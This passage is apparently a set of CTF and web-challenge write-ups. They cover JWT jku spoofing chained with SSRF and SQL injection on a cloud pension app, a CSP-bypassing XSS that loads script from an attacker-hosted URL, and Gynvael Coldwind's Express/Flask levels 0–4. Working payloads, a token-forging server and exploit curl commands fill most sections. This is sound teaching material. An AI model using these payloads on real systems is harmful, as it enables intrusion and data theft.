            if (payload.role == "anonymous") {
                return true;
            } else {
                return false;
            }
        }
    }
    return false;
}

async function verifyToken(rawToken) {
    var decodedToken = jwt.decode(rawToken, {complete: true});
    const provided_jku = url.parse(decodedToken.header.jku);
    if (ipRangeCheck(provided_jku.hostname, whitelistedIPRanges)) {
        const client = jwksClient({
            jwksUri: decodedToken.header.jku,
            timeout: 30000, // Defaults to 30s
        });
        const kid = decodedToken.header.kid;
        let publicKey = await client.getSigningKeyAsync(kid).then(key => {
         return key.getPublicKey();
        }, err => {
            return null;
        });
        try {
            let payload = jwt.verify(rawToken, publicKey);
            return payload;
        } catch (err) {
            return null;
        }
    } else {
        return null;
    }
}

function getAuthenticationToken(username,password) {
    // Wait for dev team to update the user account database
    // user account database should be live in Jan 2020
    // Issue only guest user tokens for now
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'guest', role: 'anonymous' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    return token;
}

app.post('/authenticate', (req, res) => {
    // ignore username and password for now
    // issue only guest jwt token for development
    res.json({"token" : getAuthenticationToken(req.body.username, req.body.password)})
});

app.get('/report', authenticateJWT, async (req, res, next) => {
    let message = {
        "message" : "invalid parameters"
    }
    try {f 
        if (req.query.usage == "custom-report") {
            if(!validateUserInputs(req.query.contributor_id)) {
                res.json({"results" : await getCustomReport(req.query.contributor_id)});
            } else {
                res.json(message);
            }
        } else if (req.query.usage == "summary-report") {
            res.json({"results" : await getSummaryReport()});
        } else {
            res.json(message);
        }
        next();
    } catch (e) {
        next(e);
    }
    
});

app.listen(80, () => {
    console.log('National Pension Registry API Server running on port 80!');
});

Like the previous application, there are quite a few obvious issues with the code.
Several observations can be made here:

  • There is SQL injection (SQLi) in getCustomReport() but most special characters are not permitted in the user input
  • It is necessary to present a valid JSON Web Token (JWT) containing the admin role in the JWT payload is permitted to execute custom report
  • There is /authenticate POST endpoint which allows obtaining JSON Web Token (JWT) for anonymous role
  • There is /report GET endpoint authenticating the JWT token which allows executing of the custom report function
  • The JWT token verification fetches the jku (JWK Set URL) header parameter of the token and verifies the JWT token using the public key obtained from the jku URL.
  • The jku URL specified is validated against a predefined allow-list, which appears to be mostly private IPv4 address ranges and AWS IP address ranges.
  • There is also hardcoded credentials for the PostgreSQL Database hosted on Amazon Relational Database Service (Amazon RDS) accessible via internal network

Chaining The Exploits

Hosting Our Webserver on AWS

Since we can control the jku in the JWT header, and the accepted IPv4 ranges include AWS IP address ranges, we can simply host a webserver on an Amazon Elastic Compute Cloud (Amazon EC2) instance serving the required prod-public-keys.json file to pass the validation checks against the predefined allow-list of IPv4 address ranges.

For example, the IPv4 address allocated to the AWS EC2 instance is 3.1.33.7, which resides in the 3.0.0.0/15 subnet permitted.

Signing Our Own JWT Token

Next, we need to sign our own valid JWT token with role set to admin in the JWT payload before we are able to execute a custom report. We can modify the provided National Pension Registry node.js application for the purpose of signing our own JWT tokens and also serving the JWT public key:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
const jwt = require('jsonwebtoken');
const fs = require('fs');
const privateKey = fs.readFileSync('prod-keys/prod-private-key.pem');
const publicKey = fs.readFileSync('prod-keys/prod-public-keys.json');
const PORT = 8080;
const jku_link = `http://3.1.33.7:${PORT}/prod-public-keys.json`;
const express = require('express');
const app = express();

// Sign and return our own JWT token with role set to admin and jku_link pointing to this server
app.get('/authenticate', (req, res) => {
    let custom_headers = {"jku" : jku_link};
    var token = jwt.sign({ user: 'admin', role: 'admin' }, privateKey, { algorithm: 'RS256', header: custom_headers});
    res.end(token);
});

// Serve the JWT public key on this endpoint
app.get('/prod-public-keys.json', (req, res) => {
  res.json(JSON.parse(publicKey));
});

app.listen(PORT, () => {
    console.log(`National Pension Registry API Server running on port ${PORT}!`);
});

Afterwards, we install the dependencies for the application and start the server:

$ npm install jsonwebtoken express
$ node server.js
National Pension Registry API Server running on port 8080!

SQL Injection

There is one last hurdle to get past – we also need to perform SQL injection successfully so that we can get the flag.

Let’s start by analysing the regular expression used to validate the user input:

function validateUserInputs(payload){
    // check for special characters
    var format = /[`[email protected]#$%^&*()+\-=\[\]{}':"\\|,<>\/?~]/;
    return format.test(payload);
}

Seems like we are able to use alphanumeric, whitespace, _, ; and . characters.
At this point, we can kind of guess that the flag must be somewhere in the database, and the flag is likely to be one of the records in the same table queried.

Let’s examine the SQL query too:

async function getCustomReport(contributorId){
    const results = await sequelize.query('SELECT * from records."contributions" where contributor_id = ' + contributorId, { type: sequelize.QueryTypes.SELECT });
    console.log(results);
    return results[0];
}

We can see that the injection point is not in a quoted string. Referencing the permitted characters, we can negate the where condition by doing:

SELECT * from records."contributions" where contributor_id = 1 OR null is null

Since null is null is true, this negates the first WHERE condition of contributor_id = 1. Besides that, notice that the function returns the first record returned by the query. Since there is no ORDER BY keyword used in the query, the results are not sorted before being returned. This allows us to fetch the first record in records.contributions table. If the flag is not the first record of the database, we can then further use LIMIT and OFFSET keywords to select a specific record from the table precisely as such.

For example, to select the first record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 0

Or, to select the second record from the table:

SELECT * from records."contributions" where contributor_id = 1 OR null is null limit 1 offset 1

And so on.

Getting Flag

Recall that the Employee Pension Contribution Upload Form application is accessible at http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/ and the National Pension Registry is accessible at http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/ in the internal network.

Chaining all the exploits together, we use the SSRF on the Employee Pension Contribution Upload Form application to perform SQL injection on the National Pension Registry backend application by running the following curl command on our AWS EC2 instance:

$ curl -X POST 'http://epcuf-cluster-alb-1647361482.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'endpoint=http://internal-npr-cluster-alb-1113089864.ap-southeast-1.elb.amazonaws.com/report' \
    --data-urlencode 'usage=custom-report' \
    --data-urlencode 'contributor_id=1 or null is null limit 1 offset 0' \
    --data-urlencode "token=$(curl -s http://localhost:8080/authenticate)"
{"results":{"contributor_id":7531,"contributor_name":"govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}","contribution_total":9999}}

Finally, we got the flag govtech-csg{C0nt41n3r$_w1lL-ch4ng3_tH3_FuTuR3}!

Complete Attack Path

Wow! You’re still here reading this? Thanks for sitting through this entire lengthly walkthrough!

Here’s an overview of the complete attack path for this challenge in case you are interested: Overview of Attack Path

By now, I think it is pretty evident that performing cloud penetration testing is very arduous and can become messy to the point where it is gets confusing for the tester at some point. :tired_face:

I hope you enjoyed the write-up of this challenge and learnt something new and can better identify and relate to the common cloud and web security issues often found.

Recently, BugPoC announced a XSS challenge sponsored by Amazon on Twitter. It was really fun solving this challenge! :D

The rules are simple:

  • Must alert(origin) showing https://wacky.buggywebsite.com
  • Must bypass Content-Security-Policy (CSP)
  • Must work in latest version of Google Chrome
  • Must provide proof-of-concept exploit using BugPoC (duh!)

Although the XSS challenge started a week ago, I did not have time to work on the challenge. I attempted the challenge only 9 hours before it officially ended and came up with a good idea on how to craft the solution in about 15 minutes while reading the source code on phone :joy:

This challenge is fairly simple to solve, but it requires careful observation and a good understanding of the various techniques often used when performing XSS.

Introduction

Visiting the challenge site at https://wacky.buggywebsite.com/, we can see a wacky text generator. I started off by taking a quick look at the JavaScript code loaded by the webpage:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
var isChrome = /Chrome/.test(navigator.userAgent) && /Google Inc/.test(navigator.vendor);
if (!isChrome){
  document.body.innerHTML = `
    <h1>Website Only Available in Chrome</h1>
    <p style="text-align:center"> Please visit <a href="https://www.google.com/chrome/">https://www.google.com/chrome/</a> to download Google Chrome if you would like to visit this website</p>.
  `;
}

document.getElementById("txt").onkeyup = function(){
  this.value = this.value.replace(/[&*<>%]/g, '');
};


document.getElementById('btn').onclick = function(){
  val = document.getElementById('txt').value;
  document.getElementById('theIframe').src = '/frame.html?param='+val;
};

We can see that &*<>% characters are being removed the user input in the <textarea>. On clicking on the Make Whacky! button, the page loads an iframe: /frame.html?param=, which looks interesting.

HTML Injection/Reflected XSS

There is a HTML Injection/Reflected XSS at wacky.buggywebsite.com/frame.html in the <title> tag via param GET parameter.

When visiting https://wacky.buggywebsite.com/frame.html?param=REFLECTED VALUE: </title><a></a><title>, the following HTML is returned in the response body:

<!DOCTYPE html>
<html>
  <head>
    <meta charset="UTF-8">
    <title>
      REFLECTED VALUE: </title><a></a><title>
    </title>
  ...
  <body>
    <section role="container">
      <div role="main">
        <p class="text" data-action="randomizr">REFLECTED VALUE: &lt;/title&gt;&lt;a&gt;&lt;/a&gt;&lt;title&gt;</p>
  ...

The user input supplied via the param GET parameter is being reflected twice in the response – the first is printed as-is (without any sanitization or encoding), and the second being HTML-entities encoded.

This indicates that it is possible to achieve arbitrary HTML injection (i.e. arbitrary HTML elements can be injected onto the webpage) via the param GET parameter using the first reflected param value.

Note: You need to inject </title> to end the title element. Browsers ignore any unescaped HTML elements within <title> and treats any value in <title>...</title> as text only, and will not render any HTML elements found within the title element.

However, Content-Security-Policy (CSP) header in the HTTP response is set to:

script-src 'nonce-zufpozmbvckj' 'strict-dynamic'; frame-src 'self'; object-src 'none';

Thescript-src CSP directive disallows inline scripts that do not have the nonce value. In other words, injecting reflected XSS payloads such as injecting a <script> tag directly to achieve JavaScript execution will not work as the CSP disallows executing inline scripts without the nonce value, so we need to exploit vulnerabilities in the existing JavaScript code loaded by the webpage in order to execute arbitrary JavaScript code.

Source Code Analysis

Let’s examine the JavaScript code loaded on /frame.html. The relevant code snippet is shown below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
window.fileIntegrity = window.fileIntegrity || {
    'rfc' : ' https://w3c.github.io/webappsec-subresource-integrity/',
    'algorithm' : 'sha256',
    'value' : 'unzMI6SuiNZmTzoOnV4Y9yqAjtSOgiIgyrKvumYRI6E=',
    'creationtime' : 1602687229
}

// verify we are in an iframe
if (window.name == 'iframe') {
    
    // securely load the frame analytics code
    if (fileIntegrity.value) {
        
        // create a sandboxed iframe
        analyticsFrame = document.createElement('iframe');
        analyticsFrame.setAttribute('sandbox', 'allow-scripts allow-same-origin');
        analyticsFrame.setAttribute('class', 'invisible');
        document.body.appendChild(analyticsFrame);

        // securely add the analytics code into iframe
        script = document.createElement('script');
        script.setAttribute('src', 'files/analytics/js/frame-analytics.js');
        script.setAttribute('integrity', 'sha256-'+fileIntegrity.value);
        script.setAttribute('crossorigin', 'anonymous');
        analyticsFrame.contentDocument.body.appendChild(script);
        
    }

} else {
    document.body.innerHTML = `
    <h1>Error</h1>
    <h2>This page can only be viewed from an iframe.</h2>
    <video width="400" controls>
        <source src="movie.mp4" type="video/mp4">
    </video>`
}

DOM Clobbering

The line window.fileIntegrity = window.fileIntegrity || { ... } is vulnerable to DOM clobbering. It can be observed that fileIntegrity.value is subsequently being used as the subresource integrity (SRI) hash value. By injecting an element <input id=fileIntegrity value=hash_here> onto the webpage, it is possible to clobber the fileIntegrity reference with the DOM input node, making it reference the hash value specified in the <input> tag.

Weak Inline Frame Sandbox Restrictions

It can be seen that an iframe is first being created and inserted into the DOM. However, the sandbox policy is configured to allow-scripts allow-same-origin. The allow-scripts option allows JavaScript execution, and the allow-same-origin option allows the iframe context to be treated as from being the same origin as the parent frame, therefore bypassing same-origin policy (SOP) and keeping the origin wacky.buggywebsite.com.

CSP Bypass

The code below the iframe insertion into the DOM attempts to creates a <script> element which loads a JavaScript file using the relative path files/analytics/js/frame-analytics.js. Referencing the CSP header, it can be seen that the base-uri directive is missing. This means that we can inject a <base> element with href attribute set to the attacker’s domain onto the webpage, and when the script attempts to load the relative path files/analytics/js/frame-analytics.js, the file will be loaded from the attacker-controlled domain, therefore achieving arbitrary JavaScript execution!

X-Frame-Options (XFO) Same-origin Bypass

The X-Frame-Options header in the HTTP response is set to sameorigin. This means that we cannot use an external domain to frame wacky.buggywebsite.com/frame.html to satisfy the if (window.name == 'iframe') check.

There are two ways to resolve this issue:

  1. Lure the victim user to an attacker-controlled domain, set window.name and redirecting to the vulnerable page with the XSS payload.
  2. Use HTML injection vulnerability to inject an iframe to embed itself with XSS payload (i.e. frame-ception) :sunglasses:

Option (1) is not ideal in most cases since it imposes an additional requirement for a successful XSS attack on a victim user – having to lure the user to an untrusted domain.

As such, I went ahead with option (2). We can use the HTML injection vulnerability to inject an iframe element and set name attribute to iframe on the webpage to embed itself to satisfy the check within the iframe.

However, there is a caveat to using this approach – if the aforesaid check is not satisfied on the parent frame, then the document.body.innerHTML = ... in the else statement will be executed, thereby replacing the DOM. This may cancel the loading of the iframe and hence ‘preventing’ the XSS attack from succeeding on some systems, making it an unreliable XSS attack.

To address this caveat, we can inject the start of a HTML comment <!-- without closing it with --> in the parent frame after the injected HTML elements to cause the browser to treat the rest of the webpage response as a HTML comment, hence ignoring all inline JavaScript code loaded in the remaining of the webpage.

Simulating the Attack

Before we can craft the whole exploit chain, we need to have a attacker domain hosting the XSS payload served in a JavaScript file.

To do so, we can use BugPoC’s Mock Endpoint Builder and setting it to:

Status Code: 200
Response Headers:
{
  "Content-Type": "text/javascript",
  "Access-Control-Allow-Origin": "*"
}

Response Body:
top.alert(origin)

Then, use Flexible Redirector to generate a shorter and nicer URL for the Mock Endpoint URL to be used in our exploit.

In the response header serving the XSS payload, we also need to add Access-Control-Allow-Origin: * to relax Cross-Origin Resource Sharing (CORS) since the JavaScript resource file is loaded via a cross-origin request.

Note: One thing I did not mention earlier was that because the iframe sandbox policy did not have allow-modals attribute, we cannot call alert(origin) directly in the iframe. We can simply call top.alert(origin) or parent.alert(origin) to trigger alert on the parent frame to complete the challenge.

Chaining Everything Together

Now, it’s finally time to chain everything together and exploit this XSS!

Attacker Domain Hosting XSS Payload JavaScript File:
https://y5152648ynov.redir.bugpoc.ninja

XSS Payload:
top.alert(origin)

SHA-256 Subresource Integrity Hash of XSS Payload JavaScript File:

$ openssl dgst -sha256 -binary <(printf 'top.alert(origin)') | openssl base64 -A
nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU=

Inner Frame URL (HTML Injection + CSP Bypass + DOM Clobbering + Trigger XSS):

/frame.html?param=</title><base href="https://y5152648ynov.redir.bugpoc.ninja"><input id=fileIntegrity name=value value='nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU='><title>

Outer Frame URL (HTML Injection + Load Inner Frame + Comment Out Rest of Webpage):

https://wacky.buggywebsite.com/frame.html?param=</title><iframe src="/frame.html?param=[url-encoded inner frame's param value]" name="iframe"></iframe><!--

Solution

Here’s the final solution to achieve XSS on the domain:

https://wacky.buggywebsite.com/frame.html?param=%3C/title%3E%3Ciframe%20src=%22/frame.html?param=%253C%2Ftitle%253E%253Cbase%2520href%3D%2522https%3A%2F%2Fy5152648ynov%2Eredir%2Ebugpoc%2Eninja%2522%253E%253Cinput%2520id%3DfileIntegrity%2520name%3Dvalue%2520value%3D%2527nLLJ57DQQUC9I87V0dhHnni5XBAy5rS3rr9QRuCoKQU%3D%2527%253E%253Ctitle%253E%22%20name=%22iframe%22%3E%3C/iframe%3E%3C!--

XSS Proof-of-Concept

Here are my solutions to Gynvael Coldwind (@gynvael)’s web security challenges which I thoroughly enjoyed solving!
These are specially-crafted whitebox challenges designed to test and impart certain skills.
A total of 7 independent challenges were released. Level 0 is a Flask application, whereas Levels 1 through 6 are based on Express.js.

Level 0

Problem

Target: http://challenges.gynvael.stream:5000
https://twitter.com/gynvael/status/1256352469795430407

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
#!/usr/bin/python3
from flask import Flask, request, Response, render_template_string
from urllib.parse import urlparse
import socket
import os

app = Flask(__name__)
FLAG = os.environ.get('FLAG', "???")

with open("task.py") as f:
  SOURCE = f.read()

@app.route('/secret')
def secret():
  if request.remote_addr != "127.0.0.1":
    return "Access denied!"

  if request.headers.get("X-Secret", "") != "YEAH":
    return "Nope."

  return f"GOOD WORK! Flag is {FLAG}"

@app.route('/')
def index():
  return render_template_string(
      """
      <html>
        <body>
          <h1>URL proxy with language preference!</h1>
          <form action="/fetch" method="POST">
            <p>URL: <input name="url" value="http://gynvael.coldwind.pl/"></p>
            <p>Language code: <input name="lang" value="en-US"></p>
            <p><input type="submit"></p>
          </form>
          <pre>
Task source:

          </pre>
        </body>
      </html>
      """, src=SOURCE)

@app.route('/fetch', methods=["POST"])
def fetch():
  url = request.form.get("url", "")
  lang = request.form.get("lang", "en-US")

  if not url:
    return "URL must be provided"

  data = fetch_url(url, lang)
  if data is None:
    return "Failed."

  return Response(data, mimetype="text/plain;charset=utf-8")

def fetch_url(url, lang):
  o = urlparse(url)

  req = '\r\n'.join([
    f"GET {o.path} HTTP/1.1",
    f"Host: {o.netloc}",
    f"Connection: close",
    f"Accept-Language: {lang}",
    "",
    ""
  ])

  res = o.netloc.split(':')
  if len(res) == 1:
    host = res[0]
    port = 80
  else:
    host = res[0]
    port = int(res[1])

  data = b""
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(req.encode('utf-8'))
    while True:
      data_part = s.recv(1024)
      if not data_part:
        break
      data += data_part

  return data

if __name__ == "__main__":
  app.run(debug=False, host="0.0.0.0")

Analysis

Looking at the source code provided, we see that there is a /secret route that will give the flag if request.remote_addr == "127.0.0.1" and if there is a HTTP header X-Secret: YEAH.

If there are reverse proxies that relay HTTP requests to the Flask application (e.g. Client <-> Reverse Proxy <-> Flask), then request.remote_addr may not be set correctly to the remote client’s IP address. So, let’s do a quick check to test this out:

$ curl 'http://challenges.gynvael.stream:5000/secret' -H 'X-Secret: YEAH'
Access denied!

Clearly, that didn’t work – the request.remote_addr is set correctly on the server end before it reaches the Flask app.

Let’s examine the other functionalities of the application. There is a suspicious /fetch endpoint provided, which invokes the fetch_url(url, lang) function:

def fetch_url(url, lang):
  o = urlparse(url)

  req = '\r\n'.join([
    f"GET {o.path} HTTP/1.1",
    f"Host: {o.netloc}",
    f"Connection: close",
    f"Accept-Language: {lang}",
    "",
    ""
  ])

  res = o.netloc.split(':')
  if len(res) == 1:
    host = res[0]
    port = 80
  else:
    host = res[0]
    port = int(res[1])

  data = b""
  with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((host, port))
    s.sendall(req.encode('utf-8'))
    while True:
      data_part = s.recv(1024)
      if not data_part:
        break
      data += data_part

  return data

Here, we can see that the URL is being parsed, and the hierarchical path (o.path) and network location part (o.netloc) are being extracted used alongside the lang parameter to create a raw HTTP request to the host and port specified in the network location part.

Clearly, there is a server-side request forgery (SSRF) vulnerability, since we can establish a raw socket connection to any host and port, and we have some control over the data to be sent!

Let’s check that we are able to reach the /secret endpoint with this SSRF vulnerability and pass the request.remote_addr == "127.0.0.1" check:

$ curl 'http://challenges.gynvael.stream:5000/fetch' -d 'url=http://127.0.0.1:5000/secret'
HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 5
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Fri, 3 May 2020 09:01:05 GMT

Nope.

Great! Since we are no longer getting the Access denied! error message, we have successfully passed the check.

The last piece of the puzzle is to figure out how to set the X-Secret: YEAH HTTP header. Remember the lang paramater? Turns out, it is also not sanitized as well, so we can simply inject \r\n to terminate the Accept-Language header and inject arbitrary HTTP headers (or even requests)!

Solution

$ curl 'http://challenges.gynvael.stream:5000/fetch' -d 'url=http://127.0.0.1:5000/secret' -d 'lang=%0d%0aX-Secret: YEAH'

HTTP/1.0 200 OK
Content-Type: text/html; charset=utf-8
Content-Length: 42
Server: Werkzeug/1.0.1 Python/3.6.9
Date: Fri, 3 May 2020 09:01:17 GMT

GOOD WORK! Flag is CTF{ThesePeskyNewLines}

Flag:: CTF{ThesePeskyNewLines}


Level 1

Problem

Target: http://challenges.gynvael.stream:5001
https://twitter.com/gynvael/status/1264653010111729664

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
const express = require('express')
const fs = require('fs')

const PORT = 5001
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync('app.js')

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 1\n\n")

  if (!('secret' in req.query)) {
    res.end(SOURCE)
    return
  }

  if (req.query.secret.length > 5) {
    res.end("I don't allow it.")
    return
  }

  if (req.query.secret != "GIVEmeTHEflagNOW") {
    res.end("Wrong secret.")
    return
  }

  res.end(FLAG)
})

app.listen(PORT, () => {
  console.log(`Example app listening at port ${PORT}`)
})

Analysis

In Express, req.query.* accepts and parses query string parameters into either strings, arrays or objects.

If an array is supplied, Array.toString() will return a string representation of the array values separated by commas. Furthermore, it also has a length property defining the size of the array:

> ['GIVEmeTHEflagNOW'].toString()
GIVEmeTHEflagNOW

> ['GIVEmeTHEflagNOW'].length
1

Solution

As such, we can send a secret query string parameter as an array with the constant string as its value to pass the checks and obtain the flag:

$ curl 'http://challenges.gynvael.stream:5001/?secret[]=GIVEmeTHEflagNOW'
Level 1

CTF{SmellsLikePHP}

Flag:: CTF{SmellsLikePHP}


Level 2

Problem

Target: http://challenges.gynvael.stream:5002
https://twitter.com/gynvael/status/1257784735025291265

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
const express = require('express')
const fs = require('fs')

const PORT = 5002
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync('app.js')

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 2\n\n")

  if (!('X' in req.query)) {
    res.end(SOURCE)
    return
  }

  if (req.query.X.length > 800) {
    const s = JSON.stringify(req.query.X)
    if (s.length > 100) {
      res.end("Go away.")
      return
    }

    try {
      const k = '<' + req.query.X + '>'
      res.end("Close, but no cigar.")
    } catch {
      res.end(FLAG)
    }

  } else {
    res.end("No way.")
    return
  }
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Sometimes, it’s easier to work backwards. Let’s look at where the printing of the flag is at:

try {
  const k = '<' + req.query.X + '>'
  res.end("Close, but no cigar.")
} catch {
  res.end(FLAG)
}

Here, we can see that the flag is printed only when req.query.X throws an exception.

From above, we can see that type conversion may be performed on req.query.X to convert it to a string for concatenation.
This means that the toString() method of req.query.X may be invoked.

Recall that in Express, req.query.* accepts and parses query string parameters into either strings, arrays or objects.

In JavaScript, it is possible to override the default toString() inherited from the object’s prototype for arrays and objects:

> obj = { "b" : "c" }
{ b: 'c' }
> obj.toString()
'[object Object]'
> obj.toString = () => "obj.toString() overriden!"
> "" + obj
'obj.toString() overriden!'
> obj.toString()
'obj.toString() overriden!'

> arr = [ "b", "c" ]
[ 'b', 'c' ]
> arr.toString()
'b,c'
> arr.toString = () => "arr.toString() overriden!"
> arr.toString()
'arr.toString() overriden!'
> "" + arr
'arr.toString() overriden!'

Note: This is simply overriding properties (including methods) inherited from the object’s prototype. Do not confuse the above with prototype pollution!

But, if toString is not a function, then we get a TypeError:

> obj.toString = "not a function"
> "" + obj
Uncaught TypeError: Cannot convert object to primitive value

> arr.toString = "not a function too"
> "" + arr
Uncaught TypeError: Cannot convert object to primitive value

So, we can define our custom toString property using X[toString]= (which isn’t a function) to trigger the exception and print the flag.
In fact, this issue is also raised in the Express’ documentation, and it is the developers’ responsibility to validate before trusting user-controlled input:

“As req.query’s shape is based on user-controlled input, all properties and values in this object are untrusted and should be validated before trusting. For example, req.query.foo.toString() may fail in multiple ways, for example foo may not be there or may not be a string, and toString may not be a function and instead a string or other user-input.

We can also use the same method to bypass the preceding req.query.X.length > 800 check by setting X[length]=1337 too.

Solution

$ curl 'http://challenges.gynvael.stream:5002/?X[length]=1337&X[toString]='
Level 2

CTF{WaaayBeyondPHPLikeWTF}

Flag:: CTF{WaaayBeyondPHPLikeWTF}


Level 3

Problem

Target: http://challenges.gynvael.stream:5003
https://twitter.com/gynvael/status/1259087300824305665

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
// IMPORTANT NOTE:
// The secret flag you need to find is in the path name of this JavaScript file.
// So yes, to solve the task, you just need to find out what's the path name of
// this node.js/express script on the filesystem and that's it.

const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5003
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 3\n\n")
  res.end(SOURCE)
})

app.get('/truecolors/:color', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')

  const color = ('color' in req.params) ? req.params.color : '???'

  if (color === 'red' || color === 'green' || color === 'blue') {
    res.end('Yes! A true color!')
  } else {
    res.end('Hmm? No.')
  }
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Since the goal is to leak the filepath of the JavaScript file, focus is placed on finding where exceptions are being returned in the response.

After doing a quick search on GitHub for throw statements, we see that /lib/router/layer.js throws an exception if the parameter value cannot be decoded successfully using decodeURIComponent().

Solution

Supply an invalid path parameter (e.g. %) to cause the stack trace to be shown, thereby leaking the filepath of the script and hence obtaining the flag:

$ curl 'http://challenges.gynvael.stream:5003/truecolors/%'
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>URIError: Failed to decode param &#39;%&#39;<br> &nbsp; &nbsp;at decodeURIComponent (&lt;anonymous&gt;)<br> &nbsp; &nbsp;at decode_param (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:172:12)<br> &nbsp; &nbsp;at Layer.match (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:148:15)<br> &nbsp; &nbsp;at matchLayer (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:574:18)<br> &nbsp; &nbsp;at next (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:220:15)<br> &nbsp; &nbsp;at expressInit (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/middleware/init.js:40:5)<br> &nbsp; &nbsp;at Layer.handle [as handle_request] (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/layer.js:95:5)<br> &nbsp; &nbsp;at trim_prefix (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:317:13)<br> &nbsp; &nbsp;at /usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:284:7<br> &nbsp; &nbsp;at Function.process_params (/usr/src/app/CTF{TurnsOutItsNotRegexFault}/node_modules/express/lib/router/index.js:335:12)</pre>
</body>
</html>

Flag:: CTF{TurnsOutItsNotRegexFault}


Level 4

Problem

Target: http://challenges.gynvael.stream:5004
https://twitter.com/gynvael/status/1260499214225809409

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
const express = require('express')
const fs = require('fs')
const path = require('path')

const PORT = 5004
const FLAG = process.env.FLAG || "???"
const SOURCE = fs.readFileSync(path.basename(__filename))

const app = express()

app.use(express.text({
  verify: (req, res, body) => {
    const magic = Buffer.from('ShowMeTheFlag')

    if (body.includes(magic)) {
      throw new Error("Go away.")
    }
  }
}))

app.post('/flag', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  if ((typeof req.body) !== 'string') {
    res.end("What?")
    return
  }

  if (req.body.includes('ShowMeTheFlag')) {
    res.end(FLAG)
    return
  }

  res.end("Say the magic phrase!")
})

app.get('/', (req, res) => {
  res.statusCode = 200
  res.setHeader('Content-Type', 'text/plain;charset=utf-8')
  res.write("Level 4\n\n")
  res.end(SOURCE)
})

app.listen(PORT, () => {
  console.log(`Challenge listening at port ${PORT}`)
})

Analysis

Looking at the verify function, we see that there is a body.includes(magic) check that we need to satisfy, and req.body.includes('ShowMeTheFlag') must return true in the /flag endpoint POST handler.

According to Express’ documentation for express.text(), we see that the verify option is invoked as verify(req, res, buf, encoding), where buf is a Buffer of the raw request body and encoding is the encoding of the request.

This means that the body parameter in the verify function has yet to be decoded from the encoding type specified by the client. Notice that the body.includes(magic) in the verify function implicitly assumes that the request body contents supplied is in ASCII/UTF-8, as it fails to decode and convert the raw request to a common encoding before performing the check.

Solution

The solution is simple – use a different charset that uses multibyte characters, e.g. utf-16, utf-16le, utf-16be, and encode the constant string ShowMeTheFlag in the charset specified:

$ curl -H 'Content-Type: text/plain;charset=utf-16' --data-binary @<(python -c "print 'ShowMeTheFlag'.encode('utf-16')") 'http://challenges.gynvael.stream:5004/flag'

CTF{||ButVerify()WasSupposedToProtectUs!||}

Flag:: CTF{||ButVerify()WasSupposedToProtectUs!||}


Level 5

Problem

Target: http://challenges.gynvael.stream:5005
https://twitter.com/gynvael/status/1262434816714313729

1
2
